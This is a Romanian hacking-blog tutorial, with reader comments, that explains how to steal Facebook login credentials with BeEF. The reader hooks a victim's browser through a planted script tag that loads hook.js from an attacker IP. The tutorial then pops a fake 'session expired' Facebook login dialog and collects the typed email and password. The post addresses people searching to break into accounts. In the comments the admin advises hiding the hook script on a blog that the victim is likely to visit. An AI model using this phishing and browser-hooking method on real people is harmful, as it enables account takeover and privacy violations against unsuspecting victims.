BlackWeb.ro

Top Menu

  • Descarcă BlackWeb OS
  • Despre
  • Grup Facebook – Ethical Hacking România
  • Contact

Main Menu

  • Home
  • Ghiduri Linux
  • Ghiduri Metasploit
  • Spargere parole
  • Spargere rețele Wi-Fi
  • Mai multe
    • Inginerie Socială
    • Ghiduri video
    • Cursuri Hacking
    • Alte articole
  • Descarcă BlackWeb OS
  • Despre
  • Grup Facebook – Ethical Hacking România
  • Contact

logo

BlackWeb.ro

  • Home
  • Ghiduri Linux
  • Ghiduri Metasploit
  • Spargere parole
  • Spargere rețele Wi-Fi
  • Mai multe
    • Inginerie Socială
    • Ghiduri video
    • Cursuri Hacking
    • Alte articole
  • Recunoașterea pasivă a unei potențiale victime (#2)

  • Cum spargem parolele formularelor de autentificare online utilizând BlackWebOS cu THC-Hydra & Burp Suite

  • Metasploit pentru hackerii aspiranți – Cum instalăm module noi (#12)

  • Cum instalăm DVWA pe BlackWeb OS sau pe orice altă distribuție Linux

  • Metasploit pentru hackerii aspiranți – Cum ne acoperim urmele și rămânem nedetectați (#11)

HackingInginerie SocialăTutoriale
Home›Hacking›Cum spargem un cont de Facebook utilizând ingineria socială [BeEF attack] + Tutorial Video

Cum spargem un cont de Facebook utilizând ingineria socială [BeEF attack] + Tutorial Video

By BlackWeb.ro
March 2, 2018
5115
18
Share:

Bine ați revenit, dragii mei greenhorn hackers!

Multe persoane au accesat blogul blackweb.ro prin căutări de genul ,,cum spargi o parolă facebook“, ,,cum spargi un cont facebook“, ,,facebook hacking“, ,,soft de spart parole facebook gratuit”, ,,metode uluitoare de spart parole facebook”, ,,spargere parole facebook online”, ,,cum spargem parole facebook contra cost”, ,,program de spart parole facebook tpu beef”, ,,program de spart parole facebook online gratis beef”, ,,spargere cont facebook 2018″, ,,conturi de facebook sparte beef” și multe alte interogări. În primul rând, să nu credeți că o parolă facebook nu poate fi spartă. Totuși, lucrul acesta necesită anumite abilități, pe care le puteți dobândi doar dacă sunteți atenți puțin la ceea ce se postează pe blackweb.ro



Uneori, dacă deții mici abilități, puțin noroc și puține cunoștințe de inginerie socială, poți obține datele de logare facebook ale oricărei persoane. Despre asta este acest tutorial. Dacă nu îți rezervi puțin timp să instalezi Kali Linux și să înveți câteva lucruri despre Linux, citind tutorialele Blackweb.ro, această metodă nu va funcționa pentru tine, însă dacă îți rezervi puțin timp să studiezi aici pe Blackweb, o să reușești să obții datele de logare ale unui cont facebook cu această tehnică simplă.
(Toți utilizatorii facebook să fiți atenți, dacă nu doriți să fiți hackuiți!)

Pasul 1: Instalăm Kali Linux (dacă nu cumva am făcut deja lucrul acesta)

Primul lucru pe care îl avem de făcut este să descărcăm Kali Linux. De ce? Pentru că nu putem face un asemenea hack pe sistemul de operare Windows. În Kali Linux există un program numit Browser Exploitation Framework (BeEF). Programul este capabil să ne ajute să preluăm controlul browserului victimelor noastre. O dată ce avem controlul browser-ului, sunt foarte multe lucruri pe care le putem face. Unul dintre aceste lucruri este să-i păcălim să ne ofere datele conturilor facebook.

Pasul 2: Deschidem BeEF

Deschidem Kali Linux și o să fim întâmpinați de acest screen. Pornim BeEF dând click pe iconița cu văcuța din partea stângă a desktop-ului.

Când dăm click pe ea, BeEF pornește printr-un terminal.



BeEF este un program ce lucrează în background-ul web server-ului sistemului nostru, pe care îl putem accesa din browser. O dată ce BeEF rulează, deschidem browser-ul și îi accesăm interfața. Ne logăm cu username-ul beef și parola beef.

O să fim întâmpinați de ,,ecranul de pornire”, să-i spun așa.

Pasul 3: ,,Pescuim” browser-ul victimei



Aceasta poate fi partea cea mai dificilă a hack-ului, pentru un începător, însă pentru cineva care are cunoștințe medii, această parte este simplă ca ,,bună ziua”. Așadar, dacă sunteți începători, nu vă aventurați mai departe. O veți da în bară, cel mai probabil. Mai așteptați puțin și mai documentați-vă. În special pe Blackweb, deoarece este singurul blog din România care vă învața așa ceva.
La acest pas, trebuie să faceți victima să dea click pe un link care conține un cod JavaScript, pentru a le ,,prinde” browser-ul. Ca și cum așezați momeala în acul undiței.

Cea mai simplă metodă este de a insera codul în propriul site și a scrie un articol interesant pentru victimă. Lucrul acesta se poate face prin inserarea unui link într-un text precum: Click aici pentru mai multe detalii sau Click aici pentru a vizualiza clip-ul. Folosiți-vă imaginația!

Scriptul arată ceva de genul:

<script src= “http://192.168.1.101:3000/hook.js&#8221 ; type= “text/javascript” ></script>

Pus într-o pagină web, iar atunci când cineva dă click pe el, tu deții controlul browser-ului. De aici, eu o să presupun că voi ați ,,agățat” browser-ul victimei.

Pasul 4: Trimitem o căsuță de dialog victimei

Atunci când am ,,agățat” browser-ul victimei, adresa IP, împreună cu pictogramele sistemului de operare și browser-ului ne va apărea în “Hooked Browsers” din partea stângă. Aici am utilizat browser-ul meu, pentru demonstrație. Chiar nu sunt atât de prost să fac o demonstrație utilizând o victimă, să le dau motiv ăstora să mă arunce la închisoare, pentru violarea corespondenței. Cât se mai dă? Între 3 și 5 ani?

Dacă dăm click pe browser-ul ,,agățat”, BeEF va deschide interfața în partea dreaptă. Observați că inițial avem detalii despre browser. Pe deasupra, mai avem câteva tab-uri. Momentan, pe noi ne interesează tab-ul ,,Commands”.

Dăm click pe tab-ul ,,Commands”, apoi dăm scroll down prin ,,Modules Tree” până ajungem la ,,Social Engineering” și dăm click pe acesta pentru a vedea mai multe detalii. Ni se vor arăta numeroase module dedicate ingineriei sociale. Dăm click pe ,,Pretty Theft”, care va deschide ,,Module Results History” și fereastra ,,Pretty Theft”



Acest modul ne permite să trimitem o fereastră pop-up în browser-ul victimei. În cazul nostru o să folosim căsuța de dialog Facebook.

Dacă dăm click pe ,,Dialog Type”, putem vedea că acest modul ne permite să mai creăm câte o căsuță de dialog și pentru LinkedIn, Windows, YouTube, Yammer, sau o căsuță de dialog generală. Selectăm ,,Facebook” în ,,Dialog Type”, apoi dăm click pe butonul ,,Execute”

Pasul 5: Căsuța de dialog apare pe sistemul victimei

Când dăm click pe ,,Execute” în BeEF, o căsuță de dialog apare în browser-ul victimei, precum cea de mai jos. Spune victimei că sesiunea Facebook a expirat și trebuie să își introducă din nou datele de logare.

Chiar dacă tu ești suspicios la vederea unui astfel de pop-up, cei mai mulți utilizatori chiar vor crede că sesiunea le-a expirat și vor introduce adresa de mail și parola.

Pasul 6: Adunăm datele

În interfața BeEF. putem vedea că aceste date apar în fereastra ,,COmmand results”. Victima a introdus adresa de mail și parola, iar acestea au fost capturate de BeEF.



Dacă sunteți cu adevărat determinați să spargeți cât mai multe conturi facebook, trebuie să știți că lucrul acesta nu este imposibil, iar ceea ce v-am prezentat este doar una din multele metode de a face lucrul acesta (probabil aceasta este ce mai simplă).

Dacă vrei să dezvolți abilitățile unui hacker cu adevărat competent, poți începe chiar acum, pe Blackweb.ro. Te asigur că vei căpăta cea mai prețioasă abilitate a secolului 21 – hacking-ul.



TagsBeEfconturi de facebook sparte beefcum spargem un cont facebookfacebook hackhackingInginerie Socialămetode uluitoare de spart parole facebookprogram de spart parole facebook online gratis beefprogram de spart parole facebook tpu beefsocial engineeringsoft de spart parole facebook gratuitspargem parole facebook contra costspargere cont facebook 2018spargere parole facebook online
Previous Article

Cum să hack-uim camerele video CCTV private

Next Article

Cum scanăm internetul pentru a căuta vulnerabilitățile ...

1
Shares
  • 1
  • +
  • 0
  • 0
  • 0
  • 0

Related articles More from author

  • ArticoleHackingInginerie Socială

    Cum trimit hackerii sms-uri false, făcând să pară că sunt trimise din partea unei anumite persoane

    March 6, 2018
    By BlackWeb.ro
  • ArticoleInginerie Socială

    Ce este ingineria socială?

    November 4, 2017
    By BlackWeb.ro
  • ArticoleInginerie Socială

    Pericolul din spatele testelor aparent inofensive de pe Facebook

    November 11, 2017
    By BlackWeb.ro
  • HackingTutoriale

    Cum utilizăm Netcat?

    November 30, 2018
    By BlackWeb.ro
  • HackingStrategii&Metode de spargere a parolelorTutoriale

    Cum spargem parole – Crearea unui fișier de parole personalizat cu Crunch (#4)

    March 24, 2018
    By BlackWeb.ro
  • HackingTutoriale

    Cum se poate sparge un cont de Facebook și cum ne putem apăra de un astfel de atac

    July 26, 2017
    By BlackWeb.ro

18
Leave a Reply

avatar
wpdiscuz_captcharefresh
3 Comment threads
15 Thread replies
4 Followers
 
Most reacted comment
Hottest comment thread
10 Comment authors
ArhitectulBianca PacuraruIoanaLuigiCosmin Recent comment authors
avatar
wpdiscuz_captcharefresh
  Subscribe  
newest oldest most voted
Notify of
Andrei
Guest
Andrei

daca m-ar putea ajuta care-va sunt ebrahim fatal alfo pe facebook va rog ajutati-ma ofe

Vote Up0Vote Down  Reply
6 months ago
Edi
Guest
Edi

Lasă dracu’ hacăreala, Andreiuț! Pune mâna pe o carte de gramatică! 👍

Vote Up1Vote Down  Reply
6 months ago
Luigi
Guest
Luigi

@Edi: :))))

Vote Up0Vote Down  Reply
5 months ago
sergiu somesan
Guest
sergiu somesan

O simplă căutare o să vă arate că am peste 20 de volume publicate. În ultimul roman la care tocmai lucrez folosesc și un hacker pentru spargerea unui cont. Credeți că scena descrisă este veridică? Promit un volum cu autograf pentru această „consultanță” 🙂 Nu-l cunoșteam decât sub numele de Tache și nu aveam de la el decât un număr de telefon unde nu îmi răspundea nimeni, niciodată ci doar căsuța vocală unde lăsam un mesaj. Îl sunasem ieri și azi dimineața am primit un SMS prin care îmi era stabilită o întâlnire pentru azi la ora șase seara în… Read more »

Vote Up0Vote Down  Reply
6 months ago
Arhitectul
Admin
Arhitectul

Un hacker care să se prezinte cu numele/pseudonimul de Tache? Dați un search pe google la ,,hacking pseudonyms”, să vă faceți o idee… No offence, dar dacă un hacker s-ar prezenta cu numele de Tache, personal, l-aș considera puțin retardat. Pe deasupra, obișnuiți să mâncați virgule, iar ,,țineți” se scrie fără cratimă în exemplul dvs. Scriem cu cratimă dacă am spune ,,ține-ți minte propriul cod”. Desigur, mai sunt și alte greșeli, dar asta e treaba editorului dvs., nu a mea. Revenind la scena descrisă de dvs. Un cont de facebook se poate sparge în câteva minute butonând telefonul doar în… Read more »

Vote Up0Vote Down  Reply
6 months ago
sergiu somesan
Guest
sergiu somesan

Mulțumesc, am să modific în consecință …

Vote Up0Vote Down  Reply
6 months ago
Cosmin
Guest
Cosmin

Referitor la spargerea unui cont de facebook folosind ingineria
sociala , trebuie sa trimit persoanei in cauza un link cu o pagina web
hostata , adica online ????
Si scriptul din tutorial trebuie sa fie asemanator cu al vostru , as
avea nevoie de putin ajutor

Multumesc !!!

Vote Up0Vote Down  Reply
5 months ago
Arhitectul
Admin
Arhitectul

Poți integra script-ul într-un blog hostat de blogspot, pe care este scris un articol de interes pentru victimă. Scriptul este oferit de Beef. Tot ce se schimbă este ip-ul.

Vote Up0Vote Down  Reply
5 months ago
Cosmin
Guest
Cosmin

Ati putea sa faceti un tutorial in care sa ne prezentati cum trebuie sa ne protejam pentru a nu fi identificati?

Vote Up0Vote Down  Reply
5 months ago
BlackWeb.ro
Author
BlackWeb.ro

Avem un astfel de tutorial aici: https://blackweb.ro/cum-rutam-tot-traficul-din-kali-linux-prin-tor-utilizand-whonix/ Totuși, trebuie să ținem minte un lucru: Cineva cu timp și resurse ne poate identifica oricând, indiferent de câte măsuri ne-am lua noi… Cei care spun că ei știu cum să rămână ,,complet invizibili”, mănâncă rahat cu ambele mâini. Personal, eu, un amărât de blogger, pot localiza și afla identitatea multora care doresc să rămână anonimi. Gândește-te ce ar putea face cineva’, cu mai multe cunoștințe ca ale mele și cu mulți bani la dispoziție… În special autoritățile. Că cei de la noi din țară sunt mai înceți la minte puțin și durează… Read more »

Vote Up0Vote Down  Reply
5 months ago
Cosmin
Guest
Cosmin

Tutorialul recomandat de dv. este doar pentru cei care folosesc kali linux pe virtualbox ca si sistem de operare secundar, nu?
Eu voiam niste sfaturi despre cum ne-am putea proteja identitatea atunci cand avem kali linux ca si sistem de operare principal.

Vote Up0Vote Down  Reply
5 months ago
Arhitectul
Admin
Arhitectul

Tutorialul prezentat este pentru cei care doresc să utilizeze Kali+Whonix prin Virtualbox, ceea ce este puțin mai greu.

Dacă aveți Kali instalat, puneți whonix pe un stick usb și îl rulați direct din Kali. Mai multe detalii pe:
https://www.whonix.org/wiki/Download

Acum, să răspund și la întrebarea de mai jos, dacă utilizatorul este pe fb utilizând aplicația fb pentru mobil, metoda nu va funcționa. Va trebui să așteptați să fie conectat de pe pc, înainte să inițiați atacul.

Vote Up0Vote Down  Reply
5 months ago
Cosmin
Guest
Cosmin

Metoda este valabila daca persoana in cauza foloseste un telefon mobil cu android sau ios???

Vote Up0Vote Down  Reply
5 months ago
Luigi
Guest
Luigi

Nu. Trebuie sa foloseasca pc-ul.

Vote Up0Vote Down  Reply
5 months ago
Ioana
Guest
Ioana

Si o metoda de spart parola la facebook cand este conectat de pe telefon exista ? 😀

Vote Up0Vote Down  Reply
26 days ago
Arhitectul
Admin
Arhitectul

Există, dar e nevoie de mai multă creativitate. 🙂

Vote Up0Vote Down  Reply
25 days ago
Bianca Pacuraru
Guest
Bianca Pacuraru

Arhitectul, putem lua legatura in privat?

Vote Up0Vote Down  Reply
13 days ago
Arhitectul
Admin
Arhitectul

@Bianca: Există secțiunea “Contact”. Însă te rog să citești cu mare atenție ce scrie acolo, înainte de a trimite mesajul.

Vote Up0Vote Down  Reply
13 days ago

S-ar putea să îți placă și

  • Linux: Elemente de bază

    Linux: GRUB Bootloader (#21)

  • Linux: Elemente de bază

    Linux: Networking (#6)

  • HackingStrategii&Metode de spargere a parolelorTutoriale

    Crearea unui fișier de parole personalizat, utilizând BlackWeb și Mentalist




Abonează-te la BlackWeb.ro:

Îți plac articolele noastre și vrei să fii printre primii care află ce e nou pe BlackWeb.ro? Abonează-te.

Alătură-te conversațiilor:

  • Arhitectul on Cum spargem un cont de Facebook utilizând ingineria socială [BeEF attack] + Tutorial Video@Bianca: Există secțiunea "Contact". Însă te rog să citești cu mare atenție ce scrie acolo, înainte de a trimite mesajul.
  • Bianca Pacuraru on Cum spargem un cont de Facebook utilizând ingineria socială [BeEF attack] + Tutorial VideoArhitectul, putem lua legatura in privat?
  • Arhitectul on Cum spargem parole: Strategii de spargere (#2)O poți recupera chiar tu, dacă mai ai acces la nr. de telefon, sau știi răspunsul întrebării de securitate.
  • coco on Cum spargem parole: Strategii de spargere (#2)Salut, Domnul sunt interesat sa_mi recuperez vechea adresa crezi ca potutem vb pe mail?
  • Arhitectul on Lansarea unui atac de tip Denial of Service (DoS) asupra unui punct de acces WirelessAm mai auzit de Fluxion, dar încă nu l-am folosit. Mulțeumesc pentru sugestie. O să arunc o privire asupra lui,
  • Anonymous on Lansarea unui atac de tip Denial of Service (DoS) asupra unui punct de acces WirelessFluxion-master, e totul mai automatizat si mai simplu pentru orice incepator
  • Arhitectul on [Podcast] Ingineria socială – ep. 001Mă bucur că ți-a plăcut. Vor mai urma și alte podcast-uri în viitorul apropiat.
  • D4rk on [Podcast] Ingineria socială – ep. 001Super , am ascultat tot , chiar daca stiam ce este ingineria sociala , am aflat informatii in plus.
  • Arhitectul on Cum spargem un cont de Facebook utilizând ingineria socială [BeEF attack] + Tutorial VideoExistă, dar e nevoie de mai multă creativitate. :)
  • Ioana on Cum spargem un cont de Facebook utilizând ingineria socială [BeEF attack] + Tutorial VideoSi o metoda de spart parola la facebook cand este conectat de pe telefon exista ? :-D
wpDiscuz